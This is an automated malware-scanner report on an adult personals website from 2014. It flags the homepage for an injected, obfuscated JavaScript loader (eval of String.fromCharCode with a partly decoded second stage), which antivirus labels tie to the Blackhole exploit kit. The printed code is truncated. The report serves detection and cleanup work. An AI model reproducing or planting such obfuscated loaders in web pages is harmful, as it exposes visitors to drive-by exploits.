New scan:

Malware Scanner report for freeswingers100.com

Malicious/Suspicious/Total urls checked
2/3/18
5 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://freeswingers100.com/
200 OK
Content-Length: 59279
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34
...[3541 bytes skipped]...

Decoded script:


s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];n="204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460
...[19651 bytes skipped]...

Antivirus reports:

AntiVir
JS/RunForest.B
Avast
JS:Redirector-XO [Trj]
Ikarus
Trojan.Script
nProtect
JS:Trojan.Crypt.EM
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Crypt.EM (B)
Comodo
Exploit.JS.Blacole.RB
McAfee-GW-Edition
JS/Exploit-Blacole.ek
DrWeb
Exploit.BlackHole.12
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/BlacoleRef.BS
MicroWorld-eScan
JS:Trojan.Crypt.EM
Fortinet
JS/Obfuscus.AACB!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ek
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
JS:Trojan.Crypt.EM
F-Prot
JS/IFrame.QW
AVG
JS/Agent
Norman
Blacole.HT
GData
JS:Trojan.Crypt.EM
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Crypt.EM

http://banners.adultfriendfinder.com/piclist?age=18-45&background_color=%23000000&border_color=%23999999&link_color=%23F3F3F3&models=0&override=1&p=piclist_links&pid=p15168c&show_join_link=0&site=ffadult&target=_blank&text_color=%23F3F3F3&thumb=bigthumb&title_color=%23F3F3F3
200 OK
Content-Length: 10982
Content-Type: text/javascript
clean
http://www9.addfreestats.com/cgi-bin/afstrack.cgi?usr=00916818
200 OK
Content-Length: 3239
Content-Type: application/x-javascript
clean
http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=sexpers&url=http%3a%2f%2fwww.sexypersonaladz.com
HTTP/1.1 302 Found
Connection: close
Date: Fri, 25 Jul 2014 10:29:40 GMT
Location: http://www.sexypersonaladz.com
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1
clean
http://www.sexypersonaladz.com/
200 OK
Content-Length: 24449
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.personals-100.com

<HTML>
<HEAD>
<TITLE>Sexy Personal Ads Free Sexy Adult Personals & Swingers singles Couples Bi-sexual Personals</TITLE>
<META name="description" content="Sexy personal ads Offering free swingers personals for local contacts. We have swingers personal ads with photo's,
adults singles galleries cams matchmaking and the adult personals adultfriend finder service. Sexypersonaladz for swingers,Singles,Alternat
...[4219 bytes skipped]...

http://www.sexypersonaladz.com/./rollover.js
200 OK
Content-Length: 974
Content-Type: application/javascript
clean
http://freeswingers100.com/test404page.js
404 Not Found
Content-Length: 518
Content-Type: text/html
clean
http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=swingadz&url=http%3a%2f%2fwww.swingersadz.com%2findex.htm
HTTP/1.1 302 Found
Connection: close
Date: Fri, 25 Jul 2014 10:29:43 GMT
Location: http://www.swingersadz.com/index.htm
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 407
Content-Type: text/html; charset=iso-8859-1
clean
http://www.swingersadz.com/index.htm
200 OK
Content-Length: 88119
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.personals-100.com

<HTML>
<HEAD>
<TITLE>Free Swingers Ads Galleries Cams</TITLE>
<META NAME="KEYWORDS" CONTENT="Free swingers ads, swingers galleries,swingers personals,adult personals,swingers,personals, sex, couples, swingers, adult sex, sexy personals, meet women, free sex personals, adult sex contacts, partners, photo personals, picture personals, sex dating, singles, kinky sex, sexy wives, gay, lesbian,bi-sexuals">
<
...[4173 bytes skipped]...

http://www.swingersadz.com/menu.js
200 OK
Content-Length: 8253
Content-Type: application/javascript
clean
http://freeswingers100.com/cgi-bin/toplist/menucontext.js
404 Not Found
Content-Length: 534
Content-Type: text/html
clean
http://www9.addfreestats.com/cgi-bin/afstrack.cgi?usr=00901992
200 OK
Content-Length: 981
Content-Type: application/x-javascript
clean
http://banners.adultfriendfinder.com/piclist?link_color=%230066FF&page=search&width=95%25&title_color=%23000066&size=5&background_color=%23FFFFFF&pid=p15168c&override=1&thumb=thumb&looking_for_person=1&show_join_link=0&text_color=%23000066&age=18-35
200 OK
Content-Length: 9218
Content-Type: text/javascript
clean
http://freeswingers100.com/.
200 OK
Content-Length: 59279
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34
...[3541 bytes skipped]...

Decoded script:


s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){h=-016/7;try{a=prototype;}catch(zxc){e=window["e"+"va"+"l"];n="204.351.440.495.232.315.444.550.64.330.404.600.232.246.388.550.200.333.436.390.234.327.392.505.228.120.164.615.26.30.128.160.64.96.472.485.228.96.416.525.64.183.128.580.208.315.460.230.230.303.404.500.64.141.128.580.208.315.460.230.162.177.52.50.64.96.128.160.236.291.456.160.216.333.128.305.64.348.416.525.230.138.460
...[19651 bytes skipped]...

Antivirus reports:

AntiVir
JS/RunForest.B
Avast
JS:Redirector-XO [Trj]
Ikarus
Trojan.Script
nProtect
JS:Trojan.Crypt.EM
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Crypt.EM (B)
Comodo
Exploit.JS.Blacole.RB
McAfee-GW-Edition
JS/Exploit-Blacole.ek
DrWeb
Exploit.BlackHole.12
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/BlacoleRef.BS
MicroWorld-eScan
JS:Trojan.Crypt.EM
Fortinet
JS/Obfuscus.AACB!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ek
NANO-Antivirus
Trojan.Script.Expack.bfdeei
F-Secure
JS:Trojan.Crypt.EM
F-Prot
JS/IFrame.QW
AVG
JS/Agent
Norman
Blacole.HT
GData
JS:Trojan.Crypt.EM
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Crypt.EM

http://freeswingers100.com/cgi-bin/toplist/out.cgi?id=twoshews&url=http%3a%2f%2fwww.ladieslinx.com%2findex.htm
HTTP/1.1 302 Found
Connection: close
Date: Fri, 25 Jul 2014 10:29:50 GMT
Location: http://www.ladieslinx.com/index.htm
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 406
Content-Type: text/html; charset=iso-8859-1
clean
http://www.ladieslinx.com/index.htm
200 OK
Content-Length: 67716
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.personals-100.com

<HTML>
<HEAD>
<TITLE>Ladieslinx Personals Ladies Vote Singles Couples Swingers On-Line Guide to Adult Entertainment</TITLE>
<META NAME="DESCRIPTION" CONTENT="Ladies Links Free Adult Personals Swinger Contacts Galleries Ladies Vote Worldwide Contacts Free Membership.">
<META NAME="KEYWORDS" CONTENT="ladies links,ladies vote,rate me,amateur wives,sexy wives,wifewatchers,amateur wives ,wives, personals,se
...[4116 bytes skipped]...

http://www.ladieslinx.com/./assets/rollover.js
200 OK
Content-Length: 5166
Content-Type: application/javascript
clean
http://freeswingers100.com/cgi-bin/toplist/./index.html
404 Not Found
Content-Length: 530
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: freeswingers100.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Jul 2014 10:29:34 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: freeswingers100.com
Referer: http://www.google.com/search?q=freeswingers100.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=freeswingers100.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://freeswingers100.com/

Result: freeswingers100.com is not infected or malware details are not published yet.